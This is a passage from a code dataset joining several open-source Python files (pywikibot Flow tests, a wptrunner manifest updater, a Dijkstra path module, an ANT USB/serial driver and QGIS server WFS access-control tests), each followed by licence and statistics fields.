self.assertIn('wikitext', reply_post._content)
self.assertNotIn('html', reply_post._content)
self.assertIsInstance(wikitext, unicode)
self.assertEqual(wikitext, content)
# Test reply list in topic
new_replies = topic_root.replies(force=True)
self.assertLength(new_replies, len(old_replies) + 1)
def test_reply_to_post(self):
"""Test replying to an ordinary post."""
# Setup
content = 'I am a nested reply to a regular post. Still going strong!'
topic = Topic(self.site, self._topic_title)
root_post = Post(topic, 'stf5bamzx32rj1gt')
old_replies = root_post.replies(force=True)[:]
# Reply
reply_post = root_post.reply(content, 'wikitext')
# Test content
wikitext = reply_post.get(format='wikitext')
self.assertIn('wikitext', reply_post._content)
self.assertNotIn('html', reply_post._content)
self.assertIsInstance(wikitext, unicode)
self.assertEqual(wikitext, content)
# Test reply list in topic
new_replies = root_post.replies(force=True)
self.assertLength(new_replies, len(old_replies) + 1)
def test_nested_reply(self):
"""Test replying to a previous reply to a topic."""
# Setup
first_content = 'I am a reply to the topic with my own replies. Great!'
second_content = ('I am a nested reply. This conversation is '
'getting pretty good!')
topic = Topic(self.site, self._topic_title)
topic_root = topic.root
# First reply
old_root_replies = topic_root.replies(force=True)[:]
first_reply_post = topic_root.reply(first_content, 'wikitext')
# Test first reply's content
first_wikitext = first_reply_post.get(format='wikitext')
self.assertIn('wikitext', first_reply_post._content)
self.assertNotIn('html', first_reply_post._content)
self.assertIsInstance(first_wikitext, unicode)
self.assertEqual(first_wikitext, first_content)
# Test reply list in topic
new_root_replies = topic_root.replies(force=True)
self.assertLength(new_root_replies, len(old_root_replies) + 1)
# Nested reply
old_nested_replies = first_reply_post.replies(force=True)[:]
self.assertListEqual(old_nested_replies, [])
second_reply_post = first_reply_post.reply(second_content,
'wikitext')
# Test nested reply's content
second_wikitext = second_reply_post.get(format='wikitext')
self.assertIn('wikitext', second_reply_post._content)
self.assertNotIn('html', second_reply_post._content)
self.assertIsInstance(second_wikitext, unicode)
self.assertEqual(second_wikitext, second_content)
# Test reply list in first reply
# Broken due to current Flow reply structure (T105438)
# new_nested_replies = first_reply_post.replies(force=True)
# self.assertLength(new_nested_replies, len(old_nested_replies) + 1)
# Current test for nested reply list
self.assertListEqual(old_nested_replies, [])
more_root_replies = topic_root.replies(force=True)
self.assertLength(more_root_replies, len(new_root_replies) + 1)
class TestFlowLockTopic(TestCase):
"""Locking and unlocking topics."""
family = 'wikipedia'
code = 'test'
user = True
write = True
def test_lock_unlock_topic(self):
"""Lock and unlock a test topic."""
# Setup
topic = Topic(self.site, 'Topic:Sn12rdih4iducjsd')
if topic.is_locked:
topic.unlock()
self.assertFalse(topic.is_locked)
# Lock topic
topic.lock('Pywikibot test')
self.assertTrue(topic.is_locked)
# Unlock topic
topic.unlock('Pywikibot test')
self.assertFalse(topic.is_locked)
class TestFlowHide(TestCase):
"""Hiding topics and posts."""
family = 'wikipedia'
code = 'test'
user = True
write = True
def test_hide_topic(self):
"""Hide and restore a test topic."""
# Setup
topic = Topic(self.site, 'Topic:Sl4svodmrhzmpjjh')
if topic.is_moderated:
topic.restore('Pywikibot test')
self.assertFalse(topic.is_moderated)
# Hide
topic.hide('Pywikibot test')
self.assertTrue(topic.is_moderated)
# Restore
topic.restore('Pywikibot test')
self.assertFalse(topic.is_moderated)
def test_hide_post(self):
"""Hide and restore a test post."""
# Setup
topic = Topic(self.site, 'Topic:Sl4svodmrhzmpjjh')
post = Post(topic, 'sq1qvoig1az8w7cd')
if post.is_moderated:
post.restore('Pywikibot test')
self.assertFalse(post.is_moderated)
# Hide
post.hide('Pywikibot test')
self.assertTrue(post.is_moderated)
# Restore
post.restore('Pywikibot test')
self.assertFalse(post.is_moderated)
class TestFlowDelete(TestCase):
"""Deleting topics and posts."""
family = 'wikipedia'
code = 'test'
user = True
write = True
sysop = True
def test_delete_topic(self):
"""Delete and restore a test topic."""
# Setup
topic = Topic(self.site, 'Topic:Sl4svodmrhzmpjjh')
if topic.is_moderated:
topic.restore('Pywikibot test')
self.assertFalse(topic.is_moderated)
# Delete
topic.delete_mod('Pywikibot test')
self.assertTrue(topic.is_moderated)
# Restore
topic.restore('Pywikibot test')
self.assertFalse(topic.is_moderated)
def test_delete_post(self):
"""Delete and restore a test post."""
# Setup
topic = Topic(self.site, 'Topic:Sl4svodmrhzmpjjh')
post = Post(topic, 'sq1qvoig1az8w7cd')
if post.is_moderated:
post.restore('Pywikibot test')
self.assertFalse(post.is_moderated)
# Delete
post.delete('Pywikibot test')
self.assertTrue(post.is_moderated)
# Restore
post.restore('Pywikibot test')
self.assertFalse(post.is_moderated)
class TestFlowSuppress(TestCase):
"""Suppressing topics and posts."""
family = 'wikipedia'
code = 'test'
user = True
write = True
sysop = True
def test_suppress_post(self):
"""Suppress and restore a test post."""
# Setup
topic = Topic(self.site, 'Topic:Sl4svodmrhzmpjjh')
post = Post(topic, 'sq1qvoig1az8w7cd')
if post.is_moderated:
post.restore('Pywikibot test')
self.assertFalse(post.is_moderated)
# Suppress
post.suppress('Pywikibot test')
self.assertTrue(post.is_moderated)
# Restore
post.restore('Pywikibot test')
self.assertFalse(post.is_moderated)
def test_suppress_topic(self):
"""Suppress and restore a test topic."""
# Setup
topic = Topic(self.site, 'Topic:Sl4svodmrhzmpjjh')
if topic.is_moderated:
topic.restore('Pywikibot test')
self.assertFalse(topic.is_moderated)
# Suppress
topic.suppress('Pywikibot test')
self.assertTrue(topic.is_moderated)
# Restore
topic.restore('Pywikibot test')
self.assertFalse(topic.is_moderated)
class TestFlowEditFailure(TestCase):
"""Flow-related edit failure tests."""
family = 'wikipedia'
code = 'test'
user = True
write = -1
def test_reply_to_locked_topic(self):
"""Test replying to locked topic (should raise exception)."""
# Setup
content = 'I am a reply to a locked topic. This is not good!'
topic = Topic(self.site, 'Topic:Smxnipjfs8umm1wt')
# Reply (should raise a LockedPage exception)
self.assertRaises(LockedPage, topic.reply, content, 'wikitext')
topic_root = topic.root
self.assertRaises(LockedPage, topic_root.reply, content, 'wikitext')
topic_reply = topic.root.replies(force=True)[0]
self.assertRaises(LockedPage, topic_reply.reply, content, 'wikitext')
if __name__ == '__main__': # pragma: no cover
try:
unittest.main()
except SystemExit:
pass
| mit | 6,132,236,568,618,926,000 | 32.448795 | 79 | 0.620171 | false |
SimonSapin/servo | tests/wpt/web-platform-tests/tools/wptrunner/wptrunner/manifestupdate.py | 4 | 25973 | import itertools
import os
import urlparse
from collections import namedtuple, defaultdict
from wptmanifest.node import (DataNode, ConditionalNode, BinaryExpressionNode,
BinaryOperatorNode, VariableNode, StringNode, NumberNode,
UnaryExpressionNode, UnaryOperatorNode, KeyValueNode)
from wptmanifest.backends import conditional
from wptmanifest.backends.conditional import ManifestItem
import expected
"""Manifest structure used to update the expected results of a test
Each manifest file is represented by an ExpectedManifest that has one
or more TestNode children, one per test in the manifest. Each
TestNode has zero or more SubtestNode children, one for each known
subtest of the test.
In these representations, conditionals expressions in the manifest are
not evaluated upfront but stored as python functions to be evaluated
at runtime.
When a result for a test is to be updated set_result on the
[Sub]TestNode is called to store the new result, alongside the
existing conditional that result's run info matched, if any. Once all
new results are known, coalesce_expected is called to compute the new
set of results and conditionals. The AST of the underlying parsed manifest
is updated with the changes, and the result is serialised to a file.
"""
class ConditionError(Exception):
def __init__(self, cond=None):
self.cond = cond
class UpdateError(Exception):
pass
Value = namedtuple("Value", ["run_info", "value"])
def data_cls_getter(output_node, visited_node):
# visited_node is intentionally unused
if output_node is None:
return ExpectedManifest
elif isinstance(output_node, ExpectedManifest):
return TestNode
elif isinstance(output_node, TestNode):
return SubtestNode
else:
raise ValueError
class ExpectedManifest(ManifestItem):
def __init__(self, node, test_path=None, url_base=None, property_order=None,
boolean_properties=None):
"""Object representing all the tests in a particular manifest
:param node: AST Node associated with this object. If this is None,
a new AST is created to associate with this manifest.
:param test_path: Path of the test file associated with this manifest.
:param url_base: Base url for serving the tests in this manifest.
:param property_order: List of properties to use in expectation metadata
from most to least significant.
:param boolean_properties: Set of properties in property_order that should
be treated as boolean.
"""
if node is None:
node = DataNode(None)
ManifestItem.__init__(self, node)
self.child_map = {}
self.test_path = test_path
self.url_base = url_base
assert self.url_base is not None
self.modified = False
self.boolean_properties = boolean_properties
self.property_order = property_order
self.update_properties = {
"lsan": LsanUpdate(self),
}
def append(self, child):
ManifestItem.append(self, child)
if child.id in self.child_map:
print "Warning: Duplicate heading %s" % child.id
self.child_map[child.id] = child
def _remove_child(self, child):
del self.child_map[child.id]
ManifestItem._remove_child(self, child)
def get_test(self, test_id):
"""Return a TestNode by test id, or None if no test matches
:param test_id: The id of the test to look up"""
return self.child_map.get(test_id)
def has_test(self, test_id):
"""Boolean indicating whether the current test has a known child test
with id test id
:param test_id: The id of the test to look up"""
return test_id in self.child_map
@property
def url(self):
return urlparse.urljoin(self.url_base,
"/".join(self.test_path.split(os.path.sep)))
def set_lsan(self, run_info, result):
"""Set the result of the test in a particular run
:param run_info: Dictionary of run_info parameters corresponding
to this run
:param result: Lsan violations detected"""
self.update_properties["lsan"].set(run_info, result)
def coalesce_properties(self, stability):
for prop_update in self.update_properties.itervalues():
prop_update.coalesce(stability)
class TestNode(ManifestItem):
def __init__(self, node):
"""Tree node associated with a particular test in a manifest
:param node: AST node associated with the test"""
ManifestItem.__init__(self, node)
self.subtests = {}
self._from_file = True
self.new_disabled = False
self.update_properties = {
"expected": ExpectedUpdate(self),
"max-asserts": MaxAssertsUpdate(self),
"min-asserts": MinAssertsUpdate(self)
}
@classmethod
def create(cls, test_id):
"""Create a TestNode corresponding to a given test
:param test_type: The type of the test
:param test_id: The id of the test"""
url = test_id
name = url.rsplit("/", 1)[1]
node = DataNode(name)
self = cls(node)
self._from_file = False
return self
@property
def is_empty(self):
ignore_keys = set(["type"])
if set(self._data.keys()) - ignore_keys:
return False
return all(child.is_empty for child in self.children)
@property
def test_type(self):
"""The type of the test represented by this TestNode"""
return self.get("type", None)
@property
def id(self):
"""The id of the test represented by this TestNode"""
return urlparse.urljoin(self.parent.url, self.name)
def disabled(self, run_info):
"""Boolean indicating whether this test is disabled when run in an
environment with the given run_info
:param run_info: Dictionary of run_info parameters"""
return self.get("disabled", run_info) is not None
def set_result(self, run_info, result):
"""Set the result of the test in a particular run
:param run_info: Dictionary of run_info parameters corresponding
to this run
:param result: Status of the test in this run"""
self.update_properties["expected"].set(run_info, result)
def set_asserts(self, run_info, count):
"""Set the assert count of a test
"""
self.update_properties["min-asserts"].set(run_info, count)
self.update_properties["max-asserts"].set(run_info, count)
def _add_key_value(self, node, values):
ManifestItem._add_key_value(self, node, values)
if node.data in self.update_properties:
new_updated = []
self.update_properties[node.data].updated = new_updated
for value in values:
new_updated.append((value, []))
def clear(self, key):
"""Clear all the expected data for this test and all of its subtests"""
self.updated = []
if key in self._data:
for child in self.node.children:
if (isinstance(child, KeyValueNode) and
child.data == key):
child.remove()
del self._data[key]
break
for subtest in self.subtests.itervalues():
subtest.clear(key)
def append(self, node):
child = ManifestItem.append(self, node)
self.subtests[child.name] = child
def get_subtest(self, name):
"""Return a SubtestNode corresponding to a particular subtest of
the current test, creating a new one if no subtest with that name
already exists.
:param name: Name of the subtest"""
if name in self.subtests:
return self.subtests[name]
else:
subtest = SubtestNode.create(name)
self.append(subtest)
return subtest
def coalesce_properties(self, stability):
for prop_update in self.update_properties.itervalues():
prop_update.coalesce(stability)
class SubtestNode(TestNode):
def __init__(self, node):
assert isinstance(node, DataNode)
TestNode.__init__(self, node)
@classmethod
def create(cls, name):
node = DataNode(name)
self = cls(node)
return self
@property
def is_empty(self):
if self._data:
return False
return True
class PropertyUpdate(object):
property_name = None
cls_default_value = None
value_type = None
def __init__(self, node):
self.node = node
self.updated = []
self.new = []
self.default_value = self.cls_default_value
def set(self, run_info, in_value):
self.check_default(in_value)
value = self.get_value(in_value)
# Add this result to the list of results satisfying
# any condition in the list of updated results it matches
for (cond, values) in self.updated:
if cond(run_info):
values.append(Value(run_info, value))
if value != cond.value_as(self.value_type):
self.node.root.modified = True
break
else:
# We didn't find a previous value for this
self.new.append(Value(run_info, value))
self.node.root.modified = True
def check_default(self, result):
return
def get_value(self, in_value):
return in_value
def coalesce(self, stability=None):
"""Update the underlying manifest AST for this test based on all the
added results.
This will update existing conditionals if they got the same result in
all matching runs in the updated results, will delete existing conditionals
that get more than one different result in the updated run, and add new
conditionals for anything that doesn't match an existing conditional.
Conditionals not matched by any added result are not changed.
When `stability` is not None, disable any test that shows multiple
unexpected results for the same set of parameters.
"""
try:
unconditional_value = self.node.get(self.property_name)
if self.value_type:
unconditional_value = self.value_type(unconditional_value)
except KeyError:
unconditional_value = self.default_value
for conditional_value, results in self.updated:
if not results:
# The conditional didn't match anything in these runs so leave it alone
pass
elif all(results[0].value == result.value for result in results):
# All the new values for this conditional matched, so update the node
result = results[0]
if (result.value == unconditional_value and
conditional_value.condition_node is not None):
if self.property_name in self.node:
self.node.remove_value(self.property_name, conditional_value)
else:
conditional_value.value = self.update_value(conditional_value.value_as(self.value_type),
result.value)
elif conditional_value.condition_node is not None:
# Blow away the existing condition and rebuild from scratch
# This isn't sure to work if we have a conditional later that matches
# these values too, but we can hope, verify that we get the results
# we expect, and if not let a human sort it out
self.node.remove_value(self.property_name, conditional_value)
self.new.extend(results)
elif conditional_value.condition_node is None:
self.new.extend(result for result in results
if result.value != unconditional_value)
# It is an invariant that nothing in new matches an existing
# condition except for the default condition
if self.new:
update_default, new_default_value = self.update_default()
if update_default:
if new_default_value != self.default_value:
self.node.set(self.property_name,
self.update_value(unconditional_value, new_default_value),
condition=None)
else:
try:
self.add_new(unconditional_value, stability)
except UpdateError as e:
print("%s for %s, cannot update %s" % (e, self.node.root.test_path,
self.property_name))
# Remove cases where the value matches the default
if (self.property_name in self.node._data and
len(self.node._data[self.property_name]) > 0 and
self.node._data[self.property_name][-1].condition_node is None and
self.node._data[self.property_name][-1].value_as(self.value_type) == self.default_value):
self.node.remove_value(self.property_name, self.node._data[self.property_name][-1])
# Remove empty properties
if (self.property_name in self.node._data and len(self.node._data[self.property_name]) == 0):
for child in self.node.children:
if (isinstance(child, KeyValueNode) and child.data == self.property_name):
child.remove()
break
def update_default(self):
"""Get the updated default value for the property (i.e. the one chosen when no conditions match).
:returns: (update, new_default_value) where updated is a bool indicating whether the property
should be updated, and new_default_value is the value to set if it should."""
raise NotImplementedError
def add_new(self, unconditional_value, stability):
"""Add new conditional values for the property.
Subclasses need not implement this if they only ever update the default value."""
raise NotImplementedError
def update_value(self, old_value, new_value):
"""Get a value to set on the property, given its previous value and the new value from logs.
By default this just returns the new value, but overriding is useful in cases
where we want the new value to be some function of both old and new e.g. max(old_value, new_value)"""
return new_value
class ExpectedUpdate(PropertyUpdate):
property_name = "expected"
def check_default(self, result):
if self.default_value is not None:
assert self.default_value == result.default_expected
else:
self.default_value = result.default_expected
def get_value(self, in_value):
return in_value.status
def update_default(self):
update_default = all(self.new[0].value == result.value
for result in self.new) and not self.updated
new_value = self.new[0].value
return update_default, new_value
def add_new(self, unconditional_value, stability):
try:
conditionals = group_conditionals(
self.new,
property_order=self.node.root.property_order,
boolean_properties=self.node.root.boolean_properties)
except ConditionError as e:
if stability is not None:
self.node.set("disabled", stability or "unstable", e.cond.children[0])
self.node.new_disabled = True
else:
raise UpdateError("Conflicting metadata values")
for conditional_node, value in conditionals:
if value != unconditional_value:
self.node.set(self.property_name, value, condition=conditional_node.children[0])
class MaxAssertsUpdate(PropertyUpdate):
property_name = "max-asserts"
cls_default_value = 0
value_type = int
def update_value(self, old_value, new_value):
new_value = self.value_type(new_value)
if old_value is not None:
old_value = self.value_type(old_value)
if old_value is not None and old_value < new_value:
return new_value + 1
if old_value is None:
return new_value + 1
return old_value
def update_default(self):
"""For asserts we always update the default value and never add new conditionals.
The value we set as the default is the maximum the current default or one more than the
number of asserts we saw in any configuration."""
# Current values
values = []
current_default = None
if self.property_name in self.node._data:
current_default = [item for item in
self.node._data[self.property_name]
if item.condition_node is None]
if current_default:
values.append(int(current_default[0].value))
values.extend(item.value for item in self.new)
values.extend(item.value for item in
itertools.chain.from_iterable(results for _, results in self.updated))
new_value = max(values)
return True, new_value
class MinAssertsUpdate(PropertyUpdate):
property_name = "min-asserts"
cls_default_value = 0
value_type = int
def update_value(self, old_value, new_value):
new_value = self.value_type(new_value)
if old_value is not None:
old_value = self.value_type(old_value)
if old_value is not None and new_value < old_value:
return 0
if old_value is None:
# If we are getting some asserts for the first time, set the minimum to 0
return new_value
return old_value
def update_default(self):
"""For asserts we always update the default value and never add new conditionals.
This is either set to the current value or one less than the number of asserts
we saw, whichever is lower."""
values = []
current_default = None
if self.property_name in self.node._data:
current_default = [item for item in
self.node._data[self.property_name]
if item.condition_node is None]
if current_default:
values.append(current_default[0].value_as(self.value_type))
values.extend(max(0, item.value) for item in self.new)
values.extend(max(0, item.value) for item in
itertools.chain.from_iterable(results for _, results in self.updated))
new_value = min(values)
return True, new_value
class LsanUpdate(PropertyUpdate):
property_name = "lsan-allowed"
cls_default_value = None
def get_value(self, result):
# If we have an allowed_match that matched, return None
# This value is ignored later (because it matches the default)
# We do that because then if we allow a failure in foo/__dir__.ini
# we don't want to update foo/bar/__dir__.ini with the same rule
if result[1]:
return None
# Otherwise return the topmost stack frame
# TODO: there is probably some improvement to be made by looking for a "better" stack frame
return result[0][0]
def update_value(self, old_value, new_value):
if isinstance(new_value, (str, unicode)):
new_value = {new_value}
else:
new_value = set(new_value)
if old_value is None:
old_value = set()
old_value = set(old_value)
return sorted((old_value | new_value) - {None})
def update_default(self):
current_default = None
if self.property_name in self.node._data:
current_default = [item for item in
self.node._data[self.property_name]
if item.condition_node is None]
if current_default:
current_default = current_default[0].value
new_values = [item.value for item in self.new]
new_value = self.update_value(current_default, new_values)
return True, new_value if new_value else None
def group_conditionals(values, property_order=None, boolean_properties=None):
"""Given a list of Value objects, return a list of
(conditional_node, status) pairs representing the conditional
expressions that are required to match each status
:param values: List of Values
:param property_order: List of properties to use in expectation metadata
from most to least significant.
:param boolean_properties: Set of properties in property_order that should
be treated as boolean."""
by_property = defaultdict(set)
for run_info, value in values:
for prop_name, prop_value in run_info.iteritems():
by_property[(prop_name, prop_value)].add(value)
if property_order is None:
property_order = ["debug", "os", "version", "processor", "bits"]
if boolean_properties is None:
boolean_properties = set(["debug"])
else:
boolean_properties = set(boolean_properties)
# If we have more than one value, remove any properties that are common
# for all the values
if len(values) > 1:
for key, statuses in by_property.copy().iteritems():
if len(statuses) == len(values):
del by_property[key]
if not by_property:
raise ConditionError
properties = set(item[0] for item in by_property.iterkeys())
include_props = []
for prop in property_order:
if prop in properties:
include_props.append(prop)
conditions = {}
for run_info, value in values:
prop_set = tuple((prop, run_info[prop]) for prop in include_props)
if prop_set in conditions:
if conditions[prop_set][1] != value:
# A prop_set contains contradictory results
raise ConditionError(make_expr(prop_set, value, boolean_properties))
continue
expr = make_expr(prop_set, value, boolean_properties=boolean_properties)
conditions[prop_set] = (expr, value)
return conditions.values()
def make_expr(prop_set, rhs, boolean_properties=None):
"""Create an AST that returns the value ``status`` given all the
properties in prop_set match.
:param prop_set: tuple of (property name, value) pairs for each
property in this expression and the value it must match
:param status: Status on RHS when all the given properties match
:param boolean_properties: Set of properties in property_order that should
be treated as boolean.
"""
root = ConditionalNode()
assert len(prop_set) > 0
expressions = []
for prop, value in prop_set:
number_types = (int, float, long)
value_cls = (NumberNode
if type(value) in number_types
else StringNode)
if prop not in boolean_properties:
expressions.append(
BinaryExpressionNode(
BinaryOperatorNode("=="),
VariableNode(prop),
value_cls(unicode(value))
))
else:
if value:
expressions.append(VariableNode(prop))
else:
expressions.append(
UnaryExpressionNode(
UnaryOperatorNode("not"),
VariableNode(prop)
))
if len(expressions) > 1:
prev = expressions[-1]
for curr in reversed(expressions[:-1]):
node = BinaryExpressionNode(
BinaryOperatorNode("and"),
curr,
prev)
prev = node
else:
node = expressions[0]
root.append(node)
if type(rhs) in number_types:
rhs_node = NumberNode(rhs)
else:
rhs_node = StringNode(rhs)
root.append(rhs_node)
return root
def get_manifest(metadata_root, test_path, url_base, property_order=None,
boolean_properties=None):
"""Get the ExpectedManifest for a particular test path, or None if there is no
metadata stored for that test path.
:param metadata_root: Absolute path to the root of the metadata directory
:param test_path: Path to the test(s) relative to the test root
:param url_base: Base url for serving the tests in this manifest
:param property_order: List of properties to use in expectation metadata
from most to least significant.
:param boolean_properties: Set of properties in property_order that should
be treated as boolean."""
manifest_path = expected.expected_path(metadata_root, test_path)
try:
with open(manifest_path) as f:
return compile(f, test_path, url_base, property_order=property_order,
boolean_properties=boolean_properties)
except IOError:
return None
def compile(manifest_file, test_path, url_base, property_order=None,
boolean_properties=None):
return conditional.compile(manifest_file,
data_cls_getter=data_cls_getter,
test_path=test_path,
url_base=url_base,
property_order=property_order,
boolean_properties=boolean_properties)
| mpl-2.0 | -1,674,319,530,333,104,000 | 37.027818 | 109 | 0.606707 | false |
TeamRoquette/PyRat | lib/shortestPaths.py | 1 | 1218 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
def orderPath (nodesDict, start, stop, path):
"""
Internal function used by shortestWay to
put into order nodes from the routing table.
Return the shortest path from start to stop
"""
if start == stop:
return path + [start]
return orderPath (nodesDict, start, nodesDict[stop][0], path + [stop])
def dijkstra (mazeMap, startLocation) :
"""
Return the routing table of every nodes sarting from startLocation.
"""
bestNodes = {(startLocation):((),0)}
toseeNodes = [startLocation]
while toseeNodes :
node = toseeNodes.pop(0)
neighbours = mazeMap[node]
dist = bestNodes.get(node, ([], float('inf')))[1]
for (n,d) in neighbours :
if bestNodes.get(n, ([], float('inf')))[1] > d + dist :
bestNodes[n] = (node, d + dist)
toseeNodes.append(n)
return bestNodes
def shortestWay (mazeMap, startLocation, stopLocation):
"""
Return the shortest path from startLocation to stopLocation.
Use dijkstra algorithm.
"""
return orderPath (dijkstra (mazeMap, startLocation), startLocation, stopLocation, [])
| mit | -3,572,513,400,971,579,000 | 25.478261 | 89 | 0.610837 | false |
jforge/openant | ant/base/driver.py | 1 | 8107 | # Ant
#
# Copyright (c) 2012, Gustav Tiger <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from __future__ import absolute_import, print_function
import logging
_logger = logging.getLogger("ant.base.driver")
class DriverException(Exception):
pass
class DriverNotFound(DriverException):
pass
class DriverTimeoutException(DriverException):
pass
class Driver:
@classmethod
def find(cls):
pass
def open(self):
pass
def close(self):
pass
def read(self):
pass
def write(self, data):
pass
drivers = []
try:
import array
import os
import os.path
import serial
class SerialDriver(Driver):
ID_VENDOR = 0x0fcf
ID_PRODUCT = 0x1004
@classmethod
def find(cls):
return cls.get_url() is not None
@classmethod
def get_url(cls):
try:
path = '/sys/bus/usb-serial/devices'
for device in os.listdir(path):
try:
device_path = os.path.realpath(os.path.join(path, device))
device_path = os.path.join(device_path, "../../")
ven = int(open(os.path.join(device_path, 'idVendor')).read().strip(), 16)
pro = int(open(os.path.join(device_path, 'idProduct')).read().strip(), 16)
if ven == cls.ID_VENDOR or cls.ID_PRODUCT == pro:
return os.path.join("/dev", device)
except:
continue
return None
except OSError:
return None
def open(self):
# TODO find correct port on our own, could be done with
# serial.tools.list_ports, but that seems to have some
# problems at the moment.
try:
self._serial = serial.serial_for_url(self.get_url(), 115200)
except serial.SerialException as e:
raise DriverException(e)
print("Serial information:")
print("name: ", self._serial.name)
print("port: ", self._serial.port)
print("baudrate: ", self._serial.baudrate)
print("bytesize: ", self._serial.bytesize)
print("parity: ", self._serial.parity)
print("stopbits: ", self._serial.stopbits)
print("timeout: ", self._serial.timeout)
print("writeTimeout: ", self._serial.writeTimeout)
print("xonxoff: ", self._serial.xonxoff)
print("rtscts: ", self._serial.rtscts)
print("dsrdtr: ", self._serial.dsrdtr)
print("interCharTimeout:", self._serial.interCharTimeout)
self._serial.timeout = 0
def read(self):
data = self._serial.read(4096)
# print "serial read", len(data), type(data), data
return array.array('B', data)
def write(self, data):
try:
# print "serial write", type(data), data
self._serial.write(data)
except serial.SerialTimeoutException as e:
raise DriverTimeoutException(e)
def close(self):
self._serial.close()
drivers.append(SerialDriver)
except ImportError:
pass
try:
import usb.core
import usb.util
class USBDriver(Driver):
def __init__(self):
pass
@classmethod
def find(cls):
return usb.core.find(idVendor=cls.ID_VENDOR, idProduct=cls.ID_PRODUCT) is not None
def open(self):
# Find USB device
_logger.debug("USB Find device, vendor %#04x, product %#04x", self.ID_VENDOR, self.ID_PRODUCT)
dev = usb.core.find(idVendor=self.ID_VENDOR, idProduct=self.ID_PRODUCT)
# was it found?
if dev is None:
raise ValueError('Device not found')
_logger.debug("USB Config values:")
for cfg in dev:
_logger.debug(" Config %s", cfg.bConfigurationValue)
for intf in cfg:
_logger.debug(" Interface %s, Alt %s", str(intf.bInterfaceNumber), str(intf.bAlternateSetting))
for ep in intf:
_logger.debug(" Endpoint %s", str(ep.bEndpointAddress))
# unmount a kernel driver (TODO: should probably reattach later)
try:
if dev.is_kernel_driver_active(0):
_logger.debug("A kernel driver active, detatching")
dev.detach_kernel_driver(0)
else:
_logger.debug("No kernel driver active")
except NotImplementedError as e:
_logger.warning("Could not check if kernel driver was active, not implemented in usb backend")
# set the active configuration. With no arguments, the first
# configuration will be the active one
dev.set_configuration()
dev.reset()
# dev.set_configuration()
# get an endpoint instance
cfg = dev.get_active_configuration()
interface_number = cfg[(0, 0)].bInterfaceNumber
alternate_setting = usb.control.get_interface(dev, interface_number)
intf = usb.util.find_descriptor(
cfg, bInterfaceNumber=interface_number,
bAlternateSetting=alternate_setting
)
self._out = usb.util.find_descriptor(
intf,
# match the first OUT endpoint
custom_match=
lambda e:
usb.util.endpoint_direction(e.bEndpointAddress) ==
usb.util.ENDPOINT_OUT
)
_logger.debug("UBS Endpoint out: %s, %s", self._out, self._out.bEndpointAddress)
self._in = usb.util.find_descriptor(
intf,
# match the first OUT endpoint
custom_match=
lambda e:
usb.util.endpoint_direction(e.bEndpointAddress) ==
usb.util.ENDPOINT_IN
)
_logger.debug("UBS Endpoint in: %s, %s", self._in, self._in.bEndpointAddress)
assert self._out is not None and self._in is not None
def close(self):
pass
def read(self):
return self._in.read(4096)
def write(self, data):
self._out.write(data)
class USB2Driver(USBDriver):
ID_VENDOR = 0x0fcf
ID_PRODUCT = 0x1008
class USB3Driver(USBDriver):
ID_VENDOR = 0x0fcf
ID_PRODUCT = 0x1009
drivers.append(USB2Driver)
drivers.append(USB3Driver)
except ImportError:
pass
def find_driver():
print("Driver available:", drivers)
for driver in reversed(drivers):
if driver.find():
print(" - Using:", driver)
return driver()
raise DriverNotFound
| mit | 2,882,284,457,482,533,400 | 30.917323 | 116 | 0.565684 | false |
uclaros/QGIS | tests/src/python/test_qgsserver_accesscontrol_wfs.py | 4 | 25549 | # -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsServer.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Stephane Brunner'
__date__ = '28/08/2015'
__copyright__ = 'Copyright 2015, The QGIS Project'
print('CTEST_FULL_OUTPUT')
from qgis.testing import unittest
import urllib.request
import urllib.parse
import urllib.error
from test_qgsserver_accesscontrol import TestQgsServerAccessControl, XML_NS
class TestQgsServerAccessControlWFS(TestQgsServerAccessControl):
def test_wfs_getcapabilities(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "GetCapabilities"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find("<Name>Hello</Name>") != -1,
"No Hello layer in WFS/GetCapabilities\n%s" % response)
self.assertTrue(
str(response).find("<Name>Hello_OnOff</Name>") != -1,
"No Hello layer in WFS/GetCapabilities\n%s" % response)
self.assertTrue(
str(response).find("<Name>Country</Name>") != -1,
"No Country layer in WFS/GetCapabilities\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertTrue(
str(response).find("<Name>Hello</Name>") != -1,
"No Hello layer in WFS/GetCapabilities\n%s" % response)
self.assertFalse(
str(response).find("<Name>Country</Name>") != -1,
"Unexpected Country layer in WFS/GetCapabilities\n%s" % response)
def test_wfs_describefeaturetype_hello(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "DescribeFeatureType",
"TYPENAME": "Hello"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find('name="Hello"') != -1,
"No Hello layer in DescribeFeatureType\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertTrue(
str(response).find('name="Hello"') != -1,
"No Hello layer in DescribeFeatureType\n%s" % response)
def test_wfs_describefeaturetype_country(self):
